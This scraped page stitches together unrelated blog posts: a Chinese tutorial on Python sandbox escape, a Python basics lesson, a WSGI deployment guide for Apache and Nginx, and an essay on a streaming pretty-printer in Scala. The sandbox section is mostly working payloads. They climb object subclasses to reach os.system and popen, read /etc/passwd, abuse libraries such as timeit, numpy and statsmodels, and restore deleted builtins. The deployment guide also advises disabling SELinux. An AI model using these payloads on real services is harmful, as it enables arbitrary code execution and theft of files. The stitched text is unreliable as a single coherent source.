__mro__ 在当前环境下追溯继承树

__subclasses__() 返回子类

__globals__ 作用是以一个 dict 返回函数所在模块命名空间中的所有变量。

解析一下上节的payload来理解根对象和对象继承树在绕过沙盒时的作用:

在上节中的 [x for x in [].__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0].__init__.func_globals['linecache'].__dict__['o'+'s'].__dict__['sy'+'stem']('id') payload中,大致原理是, [] , {} , '' 是 Python 中的内置变量,通过内置变量的属性和函数去访问当前 Python 环境中的继承树,可以从继承树爬到根对象类。利用 __subclasses__() 等函数向下爬向每一个 object ,这样就可以利用当前的 Python 环境执行任意代码。 >>> ''.__class__ # 获取'' 的参数类型 <type 'str'> >>> ''.__class__.__bases__ # ''的基类 (<type 'basestring'>,) >>> ''.__class__.__bases__[0] <type 'basestring'> >>> ''.__class__.__mro__ # ''的继承树 (<type 'str'>, <type 'basestring'>, <type 'object'>) >>> ''.__class__.__mro__[-1] # object是所有Python对象的基类,获取它 <type 'object'> >>> ''.__class__.__mro__[-1].__subclasses__() # 利用基类向下追溯,获取敏感类 [<type 'type'>, <type 'weakref'>, <type 'weakcallableproxy'>, <type 'weakproxy'>, <type 'int'>, <type 'basestring'>, <type 'bytearray'>, <type 'list'>, <type 'NoneType'>, <type 'NotImplementedType'>, <type 'traceback'>, <type 'super'>, <type 'xrange'>, <type 'dict'>, <type 'set'>, <type 'slice'>, <type 'staticmethod'>, <type 'complex'>, <type 'float'>, <type 'buffer'>, <type 'long'>, <type 'frozenset'>, <type 'property'>, <type 'memoryview'>, <type 'tuple'>, <type 'enumerate'>, <type 'reversed'>, <type 'code'>, <type 'frame'>, <type 'builtin_function_or_method'>, <type 'instancemethod'>, <type 'function'>, <type 'classobj'>, <type 'dictproxy'>, <type 'generator'>, <type 'getset_descriptor'>, <type 'wrapper_descriptor'>, <type 'instance'>, <type 'ellipsis'>, <type 'member_descriptor'>, <type 'file'>, <type 'PyCapsule'>, <type 'cell'>, <type 'callable-iterator'>, <type 'iterator'>, <type 'sys.long_info'>, <type 'sys.float_info'>, <type 'EncodingMap'>, <type 'fieldnameiterator'>, <type 'formatteriterator'>, <type 'sys.version_info'>, <type 'sys.flags'>, <type 'exceptions.BaseException'>, <type 'module'>, <type 'imp.NullImporter'>, <type 'zipimport.zipimporter'>, <type 'posix.stat_result'>, <type 'posix.statvfs_result'>, <class 'warnings.WarningMessage'>, <class 'warnings.catch_warnings'>, <class '_weakrefset._IterationGuard'>, <class '_weakrefset.WeakSet'>, <class '_abcoll.Hashable'>, <type 'classmethod'>, <class '_abcoll.Iterable'>, <class '_abcoll.Sized'>, <class '_abcoll.Container'>, <class '_abcoll.Callable'>, <type 'dict_keys'>, <type 'dict_items'>, <type 'dict_values'>, <class 'site._Printer'>, <class 'site._Helper'>, <type '_sre.SRE_Pattern'>, <type '_sre.SRE_Match'>, <type '_sre.SRE_Scanner'>, <class 'site.Quitter'>, <class 'codecs.IncrementalEncoder'>, <class 'codecs.IncrementalDecoder'>] >>>

然后就可以构造利用代码:

Python2的利用代码:

''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() [].__class__.__base__.__subclasses__()[40]('/etc/passwd').read()

Python3 的利用代码:

[x for x in [].__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0].__init__.__globals__['__builtins__']['eval']("__import__('os').popen('id').read()")
Python Sandboxie Escape 沙盒绕过
使用其他类库

在上节使用的是根对象继承追溯的方式去寻找可能的 对象 或 函数 ,从而利用这些语法去绕过关键字等检测。由于Python的库非常多,可以利用一些Python中的内置或者第三方库,而这些库也有命令执行等操作时,就可以尝试导入这些库,去执行命令。

timeit import timeit timeit.timeit("__import__('os').system('dir')",number=1)
Python Sandboxie Escape 沙盒绕过
exec和eval eval('__import__("os").system("id")')
Python Sandboxie Escape 沙盒绕过
platform import platform platform.popen('id').read()
Python Sandboxie Escape 沙盒绕过
numpy from numpy.distutils.exec_command import _exec_command as system2 system2('id')
Python Sandboxie Escape 沙盒绕过
statsmodels import statsmodels.tsa.x13 output = statsmodels.tsa.x13.run_spec('id').stdout.read() raise Exception(output)
Python Sandboxie Escape 沙盒绕过
reload builtins

在 Python 中,不用引用直接使用的内置函数称之为 built-in 函数。也就是我们不用导入而直接使用的如"eval","exec","open"等。

可以使用 dir(__builtins__) 来查看当前的 built-in 函数。可以看到"eval","exec","open", print 等函数都在 built-in 中。

>>> dir(__builtins__) ['ArithmeticError', 'AssertionError', 'AttributeError', 'BaseException', 'BlockingIOError', 'BrokenPipeError', 'BufferError', 'BytesWarning', 'ChildProcessError', 'ConnectionAbortedError', 'ConnectionError', 'ConnectionRefusedError', 'ConnectionResetError', 'DeprecationWarning', 'EOFError', 'Ellipsis', 'EnvironmentError', 'Exception', 'False', 'FileExistsError', 'FileNotFoundError', 'FloatingPointError', 'FutureWarning', 'GeneratorExit', 'IOError', 'ImportError', 'ImportWarning', 'IndentationError', 'IndexError', 'InterruptedError', 'IsADirectoryError', 'KeyError', 'KeyboardInterrupt', 'LookupError', 'MemoryError', 'ModuleNotFoundError', 'NameError', 'None', 'NotADirectoryError', 'NotImplemented', 'NotImplementedError', 'OSError', 'OverflowError', 'PendingDeprecationWarning', 'PermissionError', 'ProcessLookupError', 'RecursionError', 'ReferenceError', 'ResourceWarning', 'RuntimeError', 'RuntimeWarning', 'StopAsyncIteration', 'StopIteration', 'SyntaxError', 'SyntaxWarning', 'SystemError', 'SystemExit', 'TabError', 'TimeoutError', 'True', 'TypeError', 'UnboundLocalError', 'UnicodeDecodeError', 'UnicodeEncodeError', 'UnicodeError', 'UnicodeTranslateError', 'UnicodeWarning', 'UserWarning', 'ValueError', 'Warning', 'ZeroDivisionError', '__build_class__', '__debug__', '__doc__', '__import__', '__loader__', '__name__', '__package__', '__spec__', 'abs', 'all', 'any', 'ascii', 'bin', 'bool', 'breakpoint', 'bytearray', 'bytes', 'callable', 'chr', 'classmethod', 'compile', 'complex', 'copyright', 'credits', 'delattr', 'dict', 'dir', 'divmod', 'enumerate', 'eval', 'exec', 'exit', 'filter', 'float', 'format', 'frozenset', 'getattr', 'globals', 'hasattr', 'hash', 'help', 'hex', 'id', 'input', 'int', 'isinstance', 'issubclass', 'iter', 'len', 'license', 'list', 'locals', 'map', 'max', 'memoryview', 'min', 'next', 'object', 'oct', 'open', 'ord', 'pow', 'print', 'property', 'quit', 'range', 'repr', 'reversed', 'round', 'set', 'setattr', 'slice', 'sorted', 'staticmethod', 'str', 'sum', 'super', 'tuple', 'type', 'vars', 'zip'] >>>

当删除 builtin 中的函数时,在当前环境下就不能使用了。

>>> del __builtins__.__dict__['eval'] >>> del __builtins__.__dict__['open'] >>> del __builtins__.__dict__['exec'] >>> >>> exec("print('test')") Traceback (most recent call last): File "<stdin>", line 1, in <module> NameError: name 'exec' is not defined >>>

这种 删除 ,可以理解为一种内存上的 不引用 ,只是在当前允许环境下被 删除 ,而不是真正删除了文件。这种情况下的沙盒如何绕过呢?

__builtin__ 是一个默认引入的module,而这个module可以使用 reload 函数来从文件系统中重新引入。重新引入后当前运行环境中的 __builtin__ 就被 重置 了,这时就可以利用 exec , eval , open 等函数了。

>>> eval("__import__('os').system('id').read()") uid=501(dr0op) gid=20(staff) groups=20(staff) >>> del __builtins__.__dict__['eval'] >>> eval("__import__('os').system('id').read()") Traceback (most recent call last): File "<stdin>", line 1, in <module> NameError: name 'eval' is not defined >>> reload(__builtins__) <module '__builtin__' (built-in)> >>> eval("__import__('os').system('id').read()") uid=501(dr0op) gid=20(staff) groups=20(staff) >>>

此时删掉的 eval 函数重新“复活”

但是 reload 函数也是 __builtin__ 中的函数,如果将它删掉。就无法使用上述方式。在文件没有被真正删除时,就可能有方法去绕过。在Python中,有一个模块 imp ,可以利用。

import imp imp.reload(__builtin__) 包恢复

但是如果将 os 包从sys.modules中删除之后,就不能再引入了。同样的,若是没有真正删除 os.py 包,也是可以恢复的。

通过pip安装的package一般会放在如下路径之一:

/usr/local/lib/python2.7/dist-packages /usr/local/lib/python2.7/site-packages ~/.local/lib/python2.7/site-packages

将 os 从 sys.modules 中删除,可以发现不能导入 os 包。

>>> sys.modules['os'] = None >>> import os Traceback (most recent call last): File "<stdin>", line 1, in <module> ImportError: No module named os >>>

Python import 的步骤

python 所有加载的模块信息都存放在 sys.modules 结构中,当 import 一个模块> 时,会按如下步骤来进行

如果是 import A,检查 sys.modules 中是否已经有 A,如果有则不加载,如果没> > 有则为 A 创建 module 对象,并加载 A

如果是 from A import B,先为 A 创建 module 对象,再解析A,从中寻找B并填> > 充到 A 的 dict 中

此时文件并没有被删除,二引入模块,究其本质就时加载了文件,虽然在sys.modules中被删除了,但可以在文件中被重新加载进来。

>>> import sys >>> sys.modules['os']='/usr/lib/python2.7/os.py' >>> import os >>>

以上方式使用了 sys ,如果 sys 也被从 sys.modules 中删除.可以使用 execfile 直接执行文件。

>>> execfile('/usr/lib/python2.7/os.py') >>> system('id') id=501(dr0op) gid=20(staff) groups=20(staff) 实战

在某大型厂商漏洞挖掘过程中,发现其有 Python 线上运行环境,尝试对其进行沙盒绕过,获取系统权限。


Python Sandboxie Escape 沙盒绕过
Python Sandboxie Escape 沙盒绕过
总结

1, 首先判断环境时 Python2 还是 Python3 ,在利用时是有一定区别的。

2, 从根对象去向下寻找可利用函数是比较常见的沙盒绕过,例如在 Flask SSTI 中使用这种方式。例如:

从 [].__class__.__bases__[0].__subclasses__() 或者 ''.__class__.__mro__[2].__subclasses__() 出发,查看可用类。 若类中有 file ,考虑读写操作。 若类中有<class 'warnings.WarningMessage'>,考虑从 .__init__.func_globals.values()[13] 获取 eval , map 等等;又或者从 .__init__.func_globals[linecache] 得到 os 此外还有构造 so 文件的方式,具体可参考。 https://delcoding.github.io/2018/05/ciscn-writeup/
3, 关键字过滤时,使用编码等方式绕过,如 base64 , rot13 等

4, 在真实环境中非CTF测试时,首先考虑其他类库,如 timeit , platform , numpy 等。


Python基础知识大全:集合用法、文件操作、字符编码转换、函数

$
0
0

Python基础知识大全:集合用法、文件操作、字符编码转换、函数

人工智能时代,该学学python了!

既然确定学习Python了,那么就要一步一步从基础开始学习嘛~!

下面我们来看看基础知识

集合(Set)及其函数

集合是一个无序的、无重复元素的序列。

list={1,3,6,5,7,9,11,3,7}#定义集合方式一 list1=set([1,3,6,5,7,9,11,3,7])#定义集合方式二 list2=set()#定义一个空集合 print(list1,list)#打印后可看到,集合中的元素已自动去重 print(3inlist)#判断一个元素是否在集合中,返回bool值 print(20not inlist1)#判断一个元素是否不在集合中,返回bool值 list1.add(99)#新增元素 list1.update([10,20,30,2])#新增多项 list1.remove(3)#删除一个元素,若元素不存在则报错 print(list1.discard(8))#删除一个元素,若元素不存在则不做任何操作 print(len(list1))#计算集合中元素的个数 print(list1.pop())#从集合中随机弹出一个元素 list.clear()#清空集合

集合的运算

list1=set([1,3,6,5,7,9,11,3,7]) list2=set([2,4,6,8,3,5]) print(list1,list2) #交集 print(list1.intersection(list2)) print(list1&list2) #并集 print(list1.union(list2)) print(list1|list2) #差集 print(list1.difference(list2)) print(list1-list2) #对称差集 print(list1.symmetric_difference(list2)) print(list1^list2) #是否为子集是否为父集 list3=set([9,11]) print(list3.issubset(list1)) print(list1.issuperset(list3)) #若两个集合的交集为空返回true list4=set([20,30]) print(list1.isdisjoint(list4)) print(list1.isdisjoint(list2))

文件(File)操作

在开发中经常会有读写文件的需求,相关的代码实现如下:

文件的打开模式


Python基础知识大全:集合用法、文件操作、字符编码转换、函数

文件的读操纵、写操作、追加操作、按行读取文件

#read直接读文件全文 f=open('test','r',encoding='utf-8')#文件句柄 data=f.read() print(data) #write向文件中写 f=open('test1','w',encoding='utf-8') f.write('我爱北京天安门, 天安门上太阳升') #append在文件最后追加内容 f=open('test1','a',encoding='utf-8') f.write('呀呼嘿') #loop按行读取文件 #highbigger将文件作为迭代器读一行打印一行内存中只缓存一行 f=open('test','r',encoding='utf-8') count=0 forl inf: ifcount==9: print('----------') count+=1 continue print(l.strip()) count+=1 #lowloop将文件内容全部读取至内存,效率低 f=open('Sonnet','r',encoding='utf-8') for index,line inenumerate(f.readlines()): ifindex==9: print('------------') continue print(line.strip())

文件的函数

f=open('test','r',encoding='utf-8')#文件句柄读模式打开文件 print(f.tell())#获取当前光标位置 print(f.readline()) print(f.readline()) print(f.tell()) print(f.readline()) f.seek(10)#跳转光标到第10个字符 print(f.readline()) print(f.encoding)#获取文件编码 print(f.fileno())#idon'tknowwhatitis print(f.isatty())#判断文件是否是tty终端 print(f.readable())#判断文件是否是可读 print(f.writable())#判断文件是否是可写 print(f.seekable())#判断文件是否是可跳转光标(tty不可跳转 f.flush()#当用写模式打开文件时并不是写一句系统就会调用一次io若需要及时刷新硬盘中的文件内容可以调用该函数 f.close()#关闭文件 print(f.closed)#判断文件是否关闭

文件的修改

#文件的修改直接修改文件本身比较困难可以将修改写入另一个文件中如有需求可以再写回文件本身 f=open('test','r',encoding='utf-8') f_new=open('test.bak','w',encoding='utf-8') forline inf: if'我曾千万次梦见'inline: line=line.replace('我曾千万次梦见','我不想千万次梦见') f_new.writelines(line) f.close() f_new.close()

一个进度条实例 用于理解flush函数的机制 该实例可以实现进度条效果

importsys importtime f=open('Sonnet1','w',encoding='utf-8')#文件句柄写模式打开文件会新建一个文件若同名文件存在则直接覆盖 fori inrange(10): sys.stdout.write('#') sys.stdout.flush() time.sleep(0.2)

字符编码转换

字符编码转换最重要的一点就是,切记unicode是编码之间的中转站,若unicode不是目标编码或者原始编码,那么任何两个编码相互转换都需要经过unicode(见下图)。

需要注意的是,python的默认编码是ASCII,python3的默认编码是unicode。

在python3中encode,在转码的同时还会把string变成bytes类型,decode在解码的同时还会把bytes变回string。


Python基础知识大全:集合用法、文件操作、字符编码转换、函数

函数

函数是组织好的,可重复使用的,用来实现单一,或相关联功能的代码段。

函数能提高应用的模块性,和代码的重复利用率。python提供了许多内建函数(如print());也可以自己创建函数,即用户自定义函数。

定义一个有自己想要功能的函数,需要遵循以下规则:

函数代码块以 def 关键词开头,后接函数标识符名称和圆括号 () 。 任何传入参数和自变量必须放在圆括号中间,圆括号之间可以用于定义参数。 函数的第一行语句可以选择性地使用文档字符串――用于存放函数说明。 函数内容以冒号起始,并且缩进。 return [表达式] 结束函数,选择性地返回一个值给调用方。不带表达式的return相当于返回 None。

待补充知识:函数的参数、变量作用域、递归、高阶函数。

Python WEB应用部署

$
0
0

Python WEB应用部署
Python WEB应用部署
https://www.cnblogs.com/wspblog/p/8575101.html#_label0 使用Apache模块mod_wsgi运行python WSGI应用

Flask应用是基于WSGI规范的,所以它可以运行在任何一个支持WSGI协议的Web应用服务器中,最常用的就是 Apache+mod_wsgi 的方式

Apache主配置文件是/etc/httpd/conf/httpd.conf

其他配置文件存储在/etc/httpd/conf.d/目录

安装mod_wsgi

安装httpd-devel

$ yum install httpd-devel $ rpm -ql httpd-devel

安装mod__wsgi

$ yum install mod_wsgi

安装完成之后, mod_wsgi.so 会在Apache的modules目录中

在 httpd.conf 文件中添加以下内容

LoadModule wsgi_module modules/mod_wsgi.so

重启Apache来启用配置

$ sudo service httpd restart 测试mod_wsgi

在Apache的DocumentRoot根目录下创建一个文件 test.wsgi

def application(environ, start_response): status = '200 OK' output = 'Hello World!' response_headers = [('Content-type', 'text/plain'), ('Content-Length', str(len(output)))] start_response(status, response_headers) return [output]

这里的函数 application 即为WSGI应用对象,它返回的值就是该应用收到请求后的响应。

然后,再打开Apache的配置文件httpd.conf,在其最后加上URL路径映射:

WSGIScriptAlias /test /var/www/html/test.wsgi 测试 curl http://localhost/test
Python WEB应用部署
使用Python虚拟环境

virtualenv 是一个创建隔绝的Python环境的工具。virtualenv创建一个包含所有必要的可执行文件以及 pip 库的文件夹,用来使用Python工程所需的包。

配置app.wsgi

activate_this = '/var/www/html/py3env/bin/activate_this.py' execfile(activate_this, dict(__file__=activate_this)) from flask import Flask application = Flask(__name__) import sys sys.path.insert(0, '/var/www/flask_test') from app import app as application

我们的虚拟环境在目录 /var/www/html 下,你可以在其 /bin 子目录中找到启用脚本 activate_this.py 。在WSGI应用的一开始执行它即可。

apache配置文件

<VirtualHost *:80> ServerName example.com WSGIScriptAlias / /var/www/html/app.wsgi <Directory /var/www/html> Require all granted </Directory> </VirtualHost>! 参考

https://blog.csdn.net/yuzw_zw/article/details/83154633

在Apache中运行Python WSGI应用

使用Nginx+uWSGI运行Python WSGI应用

uWSGI是一个Web应用服务器,它具有应用服务器,代理,进程管理及应用监控等功能。虽然uWSGI本身就可以直接用来当Web服务器,但一般建议将其作为应用服务器配合Nginx一起使用,这样可以更好的发挥Nginx在Web端的强大功能。

安装uWSGI $ pip install uwsgi

创建 server.py

from flask import Flask app = Flask(__name__) @app.route('/') def hello_world(): return 'Hello World!' if __name__ == '__main__': app.run()

创建 uwsgi 配置文件 uwsgi.ini

[uwsgi] http=0.0.0.0:8080 #指定项目执行的端口号 chdir=/var/www/html/# 项目目录 wsgi-file=/var/www/html/server.py # 项目启动文件目录 callable=app #指定应用对象,WSGI标准是"application" master=true #主进程(监控其他进程状态,如果有进程死了,则重启) touch-reload=/var/www/html/ #监听的文件路径,当要监听的文件路径下的文件发生变化的时候自动重新加载服务器。 daemonize=uwsgi.log #日志文件 stats = 127.0.0.1:9090 #在指定的地址上,开启状态服务 vacuum = True # 当服务器退出的时候自动清理环境, # 多进程&多线程 processes = 6 threads = 2

启动

uwsgi --ini uwsgi.ini # 启动 uwsgi --reload uwsgi.pid # 重启 uwsgi --stop uwsgi.pid # 关闭
Python WEB应用部署
配置Nginx

将uWSGI的HTTP端口监听改为socket端口监听

socket=127.0.0.1:8080

修改nginx配置文件nginx.conf

server { listen 80; server_name localhost 192.168.1.5; #root /usr/share/nginx/html; # Load configuration files for the default server block. include /etc/nginx/default.d/*.conf; location / { include uwsgi_params; uwsgi_pass 127.0.0.1:8080; }

Nginx会将收到的所有请求都转发到 127.0.0.1:8080 端口上,即uWSGI服务器上。

这里有一个坑,由于Centos7 SElinux导致的权限问题,Nginx无法将请求转发到uWSGI,我直接把它关掉了。

vi /etc/selinux/config
把 SELINUX=enforcing 改成 SELINUX=disabled

重启nginx测试。


Python WEB应用部署
使用Python虚拟环境 [uwsgi] ... virtualenv=/home/Smi1e/virtualenv 部署多个应用
Python WEB应用部署
参考

使用Nginx和uWSGI来运行Python应用

Compact, Streaming Pretty-Printing of Hierarchical Data

$
0
0

Automatic Binary Serialization in uPickle 0.7

Pretty-printing hierarchical data into a human-readable form is a common thing to do. While a computer doesn't care exactly how you format the same textual data, a human would want to view data that is nicely laid out and indented, yet compact enough to make full use of the width of the output window and avoid wasting horizontal screen space. This post presents an algorithm which achieves optimal usage of horizontal space, predictable layout, and good runtime characteristics: peak heap usage linear in the width of the output window, the ability to start and stop the pretty-printing to print any portion of it, with total runtime linear in the portion of the structure printed.

Many data formats are hierarchical: whether textual formats like JSON or YAML, binary formats like MessagePack or Protobuf, or even program source code in common languages like Java or python. However, the same textual data can be formatted a variety of ways: perhaps it was written without strong style conventions, or minified to send over the wire. Binary data, of course, needs to be converted to textual data for human readability. While some data formats have interactive GUIs to let you explore them, in most cases that job falls to the pretty-printer to convert the data structure into a plain-text string that is sufficiently nicely formatted that someone can skim over it and find what they want without undue difficulty.

Requirements Compact Output

Let us consider two samples of hierarchical data, formatted to fit within a 50 character wide screen. A JSON blob:

{ "person1": { "name": "Alice", "favoriteColors": ["red", "green", "blue"] }, "person2": { "name": "Bob", "favoriteColors": [ "cyan", "magenta", "yellow", "black" ] } }

And a Python code snippet:

model = Sequential( Dense(512, activation=relu), Dense(10, activation=softmax) ) These two examples (both simplified from real code) are both roughly formatted to fit nicely within a 50 character wide output. Note how both examples have a mix of horizontally and vertically laid out structures: e.g. ["red", "green", "blue"] is horizontally laid out because it can fit within our 50 character max width, while ["cyan", "magenta", "yellow", "black"] is vertically laid out because if laid out horizontally it would overshoot. This layout makes maximal use of the horizontal space available while also formatting things vertically where necessary, resulting in compact output that is easy to read.

While there are some variety in exactly how things should be formatted - e.g. some people prefer closing braces on the same line as the enclosing statement - this post will walk through the algorithm for the choice of pretty-printing given above. Adapting it to other styles is straightforward.

Configurable Width

The way you pretty-print a structure depends on how wide you want it to be: for example, above we assumed a target width of 50 characters. If it was narrower, we would likely want to spread things out more vertically to avoid overshooting our target width. Here is the javascript example formatted for a target width of 30 characters:

{ "person1": { "name": "Alice", "favoriteColors": [ "red", "green", "blue" ] }, "person2": { "name": "Bob", "favoriteColors": [ "cyan", "magenta", "yellow", "black" ] } } Here, we can see the ["red", "green", "blue"] array that was previously laid out horizontally now is laid out vertically to avoid hitting the line limit. And the Python code snippet: model = Sequential( Dense( 512, activation=relu ), Dense( 10, activation=softmax ) )

Here, we see the Dense expressions are laid out vertically, to fit within the 30 character width limit.

Output widths can also be wider, rather than narrower. If we expand our output to 80 characters, we would expect to see more things laid out horizontally to take advantage of the added space to the right:

{ "person1": {"name": "Alice", "favoriteColors": ["red", "green", "blue"]}, "person2": { "name": "Bob", "favoriteColors": ["cyan", "magenta", "yellow", "black"] } } model = Sequential(Dense(512, activation=relu), Dense(10, activation=softmax))

Here, we see more items laid out horizontally: the entire "person1" in the JSON example fits on one line, as does the entire model in the Python example, while "person2" is still too long to fit within the 80 character limit without wrapping.

Efficiency

The last requirement that is often seen in pretty-printing is that of efficiency:

Constant heap usage: I would want to be able to pretty print large data structures without needing to load it all into memory at the same time for manipulation.

Linear execution time: pretty-printing should take time proportional to the thing you are trying to print, and shouldn't scale quadratically or exponentially when that thing gets bigger

Laziness: I should be able to print only the part of the structure that I want, and then stop. For large structures, you often only need to see part of it (e.g. first 100 lines) to figure out what you need, and you shouldn't need to pay to pretty-print the entire structure.

Note that most common pretty-printers fail these requirements. Specifically, even something like a .toString function fails (1) because it has to materialize the whole thing thing in memory, and (3) because it has to construct the entire output string before you can see any output at all. This post will show you how to do better.

The Algorithm

I will present the algorithm written in Scala, but it should be easy to understand for anyone with familiarity with programming and trivially convertible to any language of your choice.

Interface

Now that we know what our requirements are, let us define the interface of our pretty-print function:

def prettyprint(t: T, maxWidth: Int, indent: Int): Iterator[String]

In detail:

t is the thing being pretty-printed, of type T . That would be either our JSON data structure, our Python syntax tree, or something else

maxWidth is the width the pretty-printer will try to avoid breaching.

indent is how far to indent nested parts of the pretty-printed output. In the above examples, this would be 4 spaces.

The Iterator[String] being returned represents the chunks of the pretty-printed output, that the caller of the function can stream on-demand and handle individually (writing them to a file, writing to stdout, ...) with the ability to stop early at any time and without ever materializing the whole output in memory. One comon use case that we leave out here is a maxHeight: Int flag: while it is very common to want to see the first N lines of the pretty-printed output without evaluating the whole thing, this is trivially implementable on top of the Iterator[String] that prettyprint returns, and so implementing a maxHeight flag is left as an exercise to the reader.

To begin with, I will define a Tree data structure: this will be used to represent the thing we are trying to print in a hierarchical fashion:

sealed trait Tree // Foo(aa, bbb, cccc) case class Nested(prefix: String, children: Iterator[Tree], sep: String, suffix: String) extends Tree // xyz case class Literal(body: String) extends Tree This defines a type Tree with two subclasses: a Tree is either an Nested node representing something with a prefix/children/separator/suffix such as Foo(aa, bbb, cccc) or (123 456 789) , or a Literal node representing a simple string. Note that the children of an Nested node is a one-shot Iterator[Tree] , rather than a concrete Array[Tree] : we can define a Tree to mirror our data structure without actually materializing the whole thing in memory, as long as we only need to iterate over the tree once.

This is a relatively minimal representation, and is simplified for the sake of this blog post: it does not have handling for infix operators LHS op RHS , any sort of terminal nodes beyond a literal string, or anything else. Nevertheless, it is enough to handle many common formats, including the examples above. the Python example:

model = Sequential( Dense(512, activation=relu), Dense(10, activation=softmax) )

Can be represented as:

def python = Nested( "model = Sequential(", Iterator( Nested( "Dense(", Iterator(Literal("512"), Literal("activation=relu")), ",", ")" ), Nested( "Dense(", Iterator(Literal("100"), Literal("activation=softmax")), ",", ")" ), ), ",", ")" )

This is a bit of a mouthful, but it represents the entirety of the Tree that can be constructed from your Python syntax tree. Note that in real code, this would be constructed from an existing structure, rather than laid out literally as above.

Similarly the JSON snippet:

{ "person1": { "name": "Alice", "favoriteColors": ["red", "green", "blue"] }, "person2": { "name": "Bob", "favoriteColors": [ "cyan", "magenta", "yellow", "black" ] } }

Can be represented as:

def json = Nested( "{", Iterator( Nested( "\"person1\": {", Iterator( Literal("\"name\": \"Alive\""), Nested( "\"favoriteColors\": [", Iterator( Literal("\"red\""), Literal("\"green\""), Literal("\"blue\"") ), ",", "]" ) ), ",", "}" ), Nested( "\"person2\": {", Iterator( Literal("\"name\": \"Bob\""), Nested( "\"favoriteColors\": [", Iterator( Literal("\"cyan\""), Literal("\"magenta\""), Literal("\"yellow\""), Literal("\"black\"") ), ",", "]" ) ), ",", "}" ) ), ",", "}" )

Again, this would typically be constructed from your JSON data structure programmatically, and because Nested 's children is an Iterator we do not need to materialize the entire Tree in memory at the same time.

Now that we have an iterator-based Tree representation, let's change the signature of our pretty-printing function slightly to take Tree s instead of T s:

def prettyprint(t: Tree, maxWidth: Int, indent: Int): Iterator[String]

We leave out the code to go from JSON => Tree , or from Python Syntax Tree => Tree , since that would depend on the exact API of the data structure you are trying to pretty-print. For now, we will simple assume that such * => Tree functions exist.

The Implementation

The basic approach we will take with prettyprint is:

Recurse over the Tree , keeping track of the current left offset at every node

For each node, return a multiLine: Boolean of whether the current node's pretty-printing is multiple lines long, and an chunks: Iterator[String] of the chunks of pretty-printed output

For Literal nodes, this is trivial: if the body contains a newline, it is multiple lines long, and the chunks is an iterator whose sole contents is the body

For Nested nodes, this is more involved: to decide whether something is multiLine or not, we buffer up the pretty-printed chunks of its children and use those chunks to decide.

If we exhaust all the children, then return multiLine = false and an iterator over all the buffered chunks

If we fail to exhaust the children, either due to a child returning multiLine = true or due to hitting the maxWidth limit, return multiLine = true and a combined iterator of the buffered chunks and the iterator of remaining not-yet-buffered chunks

In code, this looks like:

import collection.mutable.Buffer def prettyprint(t: Tree, maxWidth: Int, indent: Int): Iterator[String] = { def recurse(current: Tree, leftOffset: Int, enclosingSepWidth: Int): (Boolean, Iterator[String]) = { current match{ case Literal(body) => val multiLine = body.contains('\n') val chunks = Iterator(body) (multiLine, chunks) case Nested(prefix, children, sep, suffix) => var usedWidth = leftOffset + prefix.length + suffix.length + enclosingSepWidth var multiLine = usedWidth > maxWidth val allChildChunks = Buffer[Iterator[String]]() // Prepare all child iterators, but do not actually consume them for(child <- children){ val (childMultiLine, childChunks) = recurse( child, leftOffset + indent, if (children.hasNext) sep.trim.length else 0 ) if (childMultiLine) multiLine = true allChildChunks += childChunks } val bufferedChunks = Buffer[Buffer[String]]() val outChunkIterator = allChildChunks.iterator var remainingIterator: Iterator[String] = Iterator.empty // Buffer child node chunks, until they run out or we become multiline while(outChunkIterator.hasNext && !multiLine){ bufferedChunks.append(Buffer()) val childIterator = outChunkIterator.next() if (outChunkIterator.hasNext) usedWidth += sep.length while (childIterator.hasNext && !multiLine){ val chunk = childIterator.next() bufferedChunks.last.append(chunk) usedWidth += chunk.length if (usedWidth > maxWidth) { remainingIterator = childIterator multiLine = true } } } def joinIterators(separated: Iterator[TraversableOnce[String]], sepChunks: Seq[String]) = { separated.flatMap(sepChunks ++ _).drop(1) } val middleChunks = if (!multiLine) { // If not multiline, just join all child chunks by the separator joinIterators(bufferedChunks.iterator, Seq(sep)) } else{ // If multiline, piece back together the last half-consumed iterator // of the last child we half-buffered before we stopped buffering. val middleChildChunks = bufferedChunks.lastOption.map(_.iterator ++ remainingIterator) // Splice it in between the chunks of the fully-buffered children // and the not-at-all buffered children, joined with separators joinIterators( separated = bufferedChunks.dropRight(1).iterator ++ middleChildChunks ++ outChunkIterator, sepChunks = Seq(sep.trim, "\n", " " * (leftOffset + indent)) ) ++ Iterator("\n", " " * leftOffset) } val chunks = Iterator(prefix) ++ middleChunks ++ Iterator(suffix) (multiLine, chunks) } } val (_, chunks) = recurse(t, 0, 0) chunks }

There's a bit of messiness in keeping track of the usedWidth , joining child iterators by the separator, and mangling the half-buffered-half-not-buffered middleChildChunks , but otherwise it should be relatively clear what this code is doing.

We can run this on the example JSON and Python Tree s above:

var last = "" for(i <- 0 until 200){ val current = prettyprint(json, maxWidth = i, indent = 4).mkString if (current != last){ println("width: " + i) println(current) last = current } } for(i <- 0 until 100){ val current = prettyprint(python, maxWidth = i, indent = 4).mkString if (current != last){ println("width: " + i) println(current) last = current } }

Here's the output for pretty-printing the Python source code:

width: 0 model = Sequential( Dense( 512, activation=relu ), Dense( 100, activation=softmax ) ) width: 32 model = Sequential( Dense(512, activation=relu), Dense( 100, activation=softmax ) ) width: 34 model = Sequential( Dense(512, activation=relu), Dense(100, activation=softmax) ) width: 79 model = Sequential(Dense(512, activation=relu), Dense(100, activation=softmax))

Here, we can see every width at which the pretty-printing changes:

Dense Dense

We can also see an identical sort of progression in the pretty-printed JSON, with it starting off totally vertically expanded but taking advantage of the horizontal space to one-line parts of the JSON as we provide it a wider and wider acceptable width:

